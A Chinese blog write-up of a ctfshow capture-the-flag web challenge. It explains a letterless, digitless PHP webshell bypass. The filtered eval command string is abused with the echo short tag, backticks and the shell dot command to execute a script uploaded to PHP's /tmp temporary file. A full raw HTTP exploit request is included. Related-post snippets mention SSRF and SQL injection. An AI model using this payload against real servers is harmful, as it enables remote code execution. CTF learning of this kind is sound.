ctfshow-web红包题第二弹

已于 2024-04-22 17:47:57 修改
阅读量2.2k 收藏 39
点赞数 34
文章标签: web安全
于 2024-04-22 17:44:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2202_75812594/article/details/138083496
版权

本题其实就是一个无字母webshell,只是手法问题。

打开题目F12看到,其实就是告诉我们要传入一个cmd参数:

<!-- hint:?cmd= -->

得到题目源码:

    <?php
        if(isset($_GET['cmd'])){
            $cmd=$_GET['cmd'];
            highlight_file(__FILE__);
            if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){
            
                die("cerror");
            }
            if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){
                die("serror");
            }
            eval($cmd);
        
        }
    
     ?>

第一个waf里面过滤了字母(但留下一个p)、数字和“$”。则我们不能通过动态函数的方法来执行webshell,包括自增。

第二个waf中,过滤了我们常用的一些符号。

总结可以使用的:

小写字母p、"?"、"<"、">"、"="、"`"、"."、";"

php文件上传

对于php而言,文件上传功能是默认的行为,不论php代码是怎样

我们可以发送一个上传文件的post包,此时php会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpxxxxxx,文件名最后6个字符是随机的大小写字母。如/tmp/php123abc

 在数据包中,文件上传格式为multipart/form-data类型, boundary定义边界符。如

Content-Type: multipart/form-data; boundary=this_is_boundary

其数据如下,上传的文件内容为:(上传一个bash脚本,#!/bin/sh为解释器)

#!/bin/sh
find / -name *flag*

--this_is_boundary
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#!/bin/sh
find / -name *flag*
--this_is_boundary--

ph命令执行

原文链接

php里面有很多执行系统命令的函数,如exec等.
反引号也可以用于执行系统命令,并把执行完成的结果以字符串的形式返回,而本题未过滤反引号,可以进行利用.除此之外,我们还需要对执行结果进行输出,但是输出函数以及全部被过滤.这就涉及段标记语法了.<?= ... ?> 是在 PHP 中的一种短标记(short tag)语法,也被称为echo短标记,它可以简化输出变量或表达式的操作。使用<?= ... ?>就相当于echo … 使用段标记需要<?标签,因此我们构造 cmd=?><?=`.+/??p/p?p??????`;先把前面的<?php闭合,再与后面的?>形成一个短标签.再PHP里面.再Linux里面, .(点命令)使source命令的别名,用于读取并且在当前的shell中执行文件中的命令,加号+等价于空格,于是通过构造.+/执行后面的脚本文件.之后就是通过模糊匹配,用?通配符对上传的文件进行匹配,tmp目录写成??p,php临时文件写成p?p???,最后变成cmd=?><?=`.+/??p/p?p???`;

playload:

POST /?cmd=?><?=`.%20/??p/p?p??????`;?> HTTP/1.1
Host: bdb2fa1a-e91b-4ad8-b041-7e148786f12f.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=this_is_boundary
Content-Length: 163

--this_is_boundary
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#!/bin/sh
cat /flag.txt
--this_is_boundary--

p神文章: 

 一些不包含数字和字母的webshell | 离别歌 (leavesongs.com)

无字母数字webshell之提高篇 | 离别歌 (leavesongs.com)

心故
关注
ctfshow 红包第九 ssrf
m0_46412682的博客
07-14 1215
开始的页面 随便输入一个username,好像是报错 burpsuit抓包 在输入username和密码那里好像有ssrf,输入一个http://www.baid.com,看它有没有返回百度的页面,有则存在ssrf漏洞,经测试是有的 虽然目提示PS:由于出现权限问,取消了mysql密码,端口还 原为3306,但是还是要试下file读取本地文件,看下有没flag.txt 经测试是没有的,那就按目的提示,ssrf攻击mysql,这里用到gopher协议和gopherus工具。 gopherus工具http
[CTFSHOW][红包]耗子尾汁
Y4tacker的博客
12-01 1895
文章目录前言前置知识代码审计简单分析函数说明以及预期解非预期解参考文章 前言 很开心今天拿了一个一血,也谢谢Firebasky师傅的目了 前置知识 在php当中默认命名空间是\,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name()这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法 代码审计 简单分析 传入参数a与b,如
ctfshow web红包第二
最新发布
2302_76724233的博客
09-05 1759
我们可以发送一个上传文件的post包,此时php会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpxxxxxx,文件名最后6个字符是随机的大小写字母。但是值得一提的是,通常这些临时文件夹下的文件最后是会被删除的,所以我们不得不想办法在被删除之前执行我们上传的文件。但既然是php的命令执行漏洞,这俩应该是
CTFshow--web--红包第二
weixin_45908624的博客
01-29 1250
web--红包第二
CTFshow-web-红包第二
qq_68581192的博客
10-24 521
在Linux的PHP环境下面,客户端(页面)如果对服务器上传文件,会先生成一个临时文件,存放在根目录下面的tmp文件夹下面,也就是/tmp目录下面.之后再对临时文件进行处理,比如是否将其存储到本地.无论服务器是否存在一个上传文件的请求,只要我们上传了一个临时文件,就一定会在该目录下面生成临时文件,但是会在生成后立刻删除.这个临时文件有一个特征,就是以php开头,后面跟6个随机字符,比如php123abc.因此我们可以使用通配符*对该文件进行匹配.通配符对上传的文件进行匹配,tmp目录写成?
CTFSHOW 红包第二
Firebasky的博客
08-12 3042
直接上目 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(preg_ma
ctfshow-红包第二
HAI_WD的博客
08-24 890
还有一个知识点就是如果是PHP上传文件的话,会在/tmp下生成一个为phpxxxxxx的文件x为随机字母。执行之后可以看到文件代码,可以看到也是eval,但是中间对大部分的字符串都进行了过滤,留下了一个字母p。同样,先看一下有没有注释的内容,可以看到有一个cmd的入参。这里就需要知道一个知识点,php中可以通过。进行打印,相当于echo,但是必须使用。那么构造一下poc:就是。对之前的内容进行闭合。
CTFSHOW 红包第二学习
qq_51558360的博客
04-02 1228
PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上传到upload_tmp_dir配置的目录下,上传完后会被删除。 PHP命令执行 eval($cmd); 执行命令方式: system('ls'); echo(`ls`); echo+反引号 ?><?=`ls`; <?=是echo()的别名用法,不需要开
ctfshow-红包第五
m0_67507776的博客
04-19 939
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
ctfshow红包第六 wp
jwkaaaaaa的博客
07-11 345
ctfshow红包第六 wp
ctfshow-web-web红包
07-14
ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 685
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 641
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
CTFSHOW WEB 红包第二
Ethan552525的博客
07-05 4215
目: 解: 1:F12--查看源码 发现提示:?cmd= <!-- hint:?cmd= --> 2:尝试通过url传参数cmd,随意输入cmd=aaa http://2799b166-4390-45e9-a3f4-711d2a5e64c5.challenge.ctf.show:8080/?cmd=aaa 得到: if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(pr..
ctf.show_红包 第二
qq_74414939的博客
09-28 575
进入页面,打开f12,发现提示,可能存在cmd命令注入。之后尝试在url对cmd进行注入,发现了一段php代码可以发现,服务器过滤了大部分字母和符号,只剩下p,+,点,/,反引号,等。于是我们选择上传一个脚本文件进行执行。于是我们用burpsuite抓包获取请求头.
ctfshow 红包第二(无数字字母无~^RCE)
qq_44657899的博客
08-14 3847
颖奇L’Amore师傅wp 这道啥也不会,总结下知识点吧。 文章目录0x01 PHP上传机制0x02 PHP命令执行0x03 通配符与无字母数组命令执行解 0x01 PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上传到upload_tmp_dir配置的目录下,上传完后会被删除。 这里本地实验了一下,的确如此,我使用的是wi
CTF.show:红包第二
qq_46230755的博客
01-15 1812
学习一下知识点: 先马住p神的两篇文章 一些不包含数字和字母的 webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 无字母数字 webshell 之提高篇 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html 这一段Y1ng师傅说的很详细了 https://www.gem-love.com/web
Struts框架_10 上传下载
XiaoXiao_Lin的博客
10-31 261
1.文件的上传: 1).表单需要注意的3点 2)Struts2 的文件上传实际,使用的是CommonsFileUpload组件,所以需要导入 commons -fileup1oad-1.3. jar commons-io-2.0.1.jar 3). Struts2 进行文件上传需要使用FileUpload 拦截器 4),基本的文件的上传: 直接在Action中定义如下3个属性,并提供对应的getter和setter //文件对应的File对象 private File [fileFieldName]; /.
ctfshow 红包
qq_62046696的博客
08-28 872
其实这几道都是通过php的扩展来做,还是需要多翻php文档。
ctfshow web红包第二
09-20
引用中的代码段是一个简单的PHP代码,它接受一个名为"cmd"的GET参数,在输入的命令通过eval函数执行之前进行了一些检查。如果命令中包含非法字符或者特殊字符,则会返回错误信息。而引用中的代码是通过POST请求修改了GET参数"cmd"的值,实际上是通过命令执行的方式遍历根目录下的文件,并找到了flag.txt文件。至于引用中提到的php://input输入流,则与此目无关。 所以,ctf.show web红包第二是通过修改GET参数"cmd"的值,发送POST请求来获取flag.txt文件。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值